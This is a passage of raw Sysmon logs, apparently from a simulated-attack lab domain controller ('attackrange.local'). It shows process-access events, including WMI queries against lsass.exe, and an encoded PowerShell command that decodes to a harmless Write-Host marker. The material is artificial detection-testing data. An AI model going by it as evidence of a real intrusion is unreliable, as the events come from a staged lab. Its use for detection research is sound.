ll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D64-603E-84AA-00000000AD01}9536ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gmw44tlm.vq1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.073{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.073{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.072{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.071{05ADC7E1-6D64-603E-84AA-00000000AD01}9536ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mzz1jzek.345.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.070{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.068{05ADC7E1-6D64-603E-80AA-00000000AD01}5464ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.068{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74050C72B7D5FF495F7FDEE598D206B7,SHA256=739E183AAA19949A8AF37F5E6E09B013D61BFFC0E17D359D23601F6D08021C7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.062{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D65-603E-87AA-00000000AD01}5196C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002237714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.054{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EncodedComman VwByAGkAdABlAC0ASABvAHMAdAAgAGUAZgAxADEANAAwAGUAMwAtADAANAAwAGQALQA0ADkAZABkAC0AYQA2AGQANwAtAGEANAAyAGEANQAyADQAMABjAGIANwAyAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002237713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.043{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mzz1jzek.345.ps12021-03-02 16:52:53.043 10341000x80000000000000002237712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.028{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-85AA-00000000AD01}15020C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-83AA-00000000AD01}14172C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 